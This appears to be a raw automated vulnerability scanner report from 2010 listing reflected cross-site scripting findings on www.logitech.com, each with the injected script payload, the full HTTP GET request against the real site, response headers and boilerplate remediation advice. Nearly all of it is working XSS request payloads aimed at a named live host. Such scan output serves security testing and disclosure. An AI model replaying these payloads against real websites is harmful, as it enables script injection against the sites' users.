HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d7e4"%3bce9eebcfdfc was submitted in the REST URL parameter 1. This input was echoed as 5d7e4";ce9eebcfdfc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us5d7e4"%3bce9eebcfdfc/441/301 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8266f"><script>alert(1)</script>9cc9c2ef357 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/4418266f"><script>alert(1)</script>9cc9c2ef357/301 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9c8f</script><script>alert(1)</script>d143ab85cf3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/441e9c8f</script><script>alert(1)</script>d143ab85cf3/301 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afefe"><script>alert(1)</script>1a63a2deb4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/441/301afefe"><script>alert(1)</script>1a63a2deb4e HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd9b7</script><script>alert(1)</script>651fd170874 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/441/301cd9b7</script><script>alert(1)</script>651fd170874 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83c4e"><script>alert(1)</script>46d6a586978 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us83c4e"><script>alert(1)</script>46d6a586978/478/2991 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e001"%3bb361345eb45 was submitted in the REST URL parameter 1. This input was echoed as 8e001";b361345eb45 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us8e001"%3bb361345eb45/478/2991 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd32e</script><script>alert(1)</script>9e4498ec728 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dd32e</script><script>alert(1)</script>9e4498ec728/478/2991 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f12ff"><script>alert(1)</script>6494013b555 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478f12ff"><script>alert(1)</script>6494013b555/2991 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c73a</script><script>alert(1)</script>87397b65f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/4783c73a</script><script>alert(1)</script>87397b65f5/2991 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d7b1</script><script>alert(1)</script>e25e37a1843 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/29913d7b1</script><script>alert(1)</script>e25e37a1843 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8abd1"><script>alert(1)</script>92918899e68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/29918abd1"><script>alert(1)</script>92918899e68 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e9c9"%3b433f656e900 was submitted in the REST URL parameter 1. This input was echoed as 5e9c9";433f656e900 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us5e9c9"%3b433f656e900/478/3008 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4878f</script><script>alert(1)</script>a94e9b3ecec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /4878f</script><script>alert(1)</script>a94e9b3ecec/478/3008 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f60"><script>alert(1)</script>ceab558f02f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us92f60"><script>alert(1)</script>ceab558f02f/478/3008 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66a7c</script><script>alert(1)</script>e6082442c70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/47866a7c</script><script>alert(1)</script>e6082442c70/3008 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb24"><script>alert(1)</script>a7a6c848251 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/4786eb24"><script>alert(1)</script>a7a6c848251/3008 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c13bd</script><script>alert(1)</script>8e2cb69a37b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/3008c13bd</script><script>alert(1)</script>8e2cb69a37b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6319"><script>alert(1)</script>5daa118906 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/3008e6319"><script>alert(1)</script>5daa118906 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3a5"><script>alert(1)</script>3ebdb93cc25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us6d3a5"><script>alert(1)</script>3ebdb93cc25/478/3023 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98c25"%3bc48762d5901 was submitted in the REST URL parameter 1. This input was echoed as 98c25";c48762d5901 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us98c25"%3bc48762d5901/478/3023 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd3c7</script><script>alert(1)</script>c590fc68ee2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dd3c7</script><script>alert(1)</script>c590fc68ee2/478/3023 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cb70"><script>alert(1)</script>c039550b1db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/4788cb70"><script>alert(1)</script>c039550b1db/3023 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39194</script><script>alert(1)</script>39c6399fcd7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/47839194</script><script>alert(1)</script>39c6399fcd7/3023 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92d33</script><script>alert(1)</script>2ef4e998446 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/302392d33</script><script>alert(1)</script>2ef4e998446 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14140"><script>alert(1)</script>68d9b11d86e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/302314140"><script>alert(1)</script>68d9b11d86e HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dff2"%3b8b6c883afc7 was submitted in the REST URL parameter 1. This input was echoed as 5dff2";8b6c883afc7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us5dff2"%3b8b6c883afc7/478/3025 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 852fc</script><script>alert(1)</script>8f05f9603df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /852fc</script><script>alert(1)</script>8f05f9603df/478/3025 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:20 GMT Connection: close
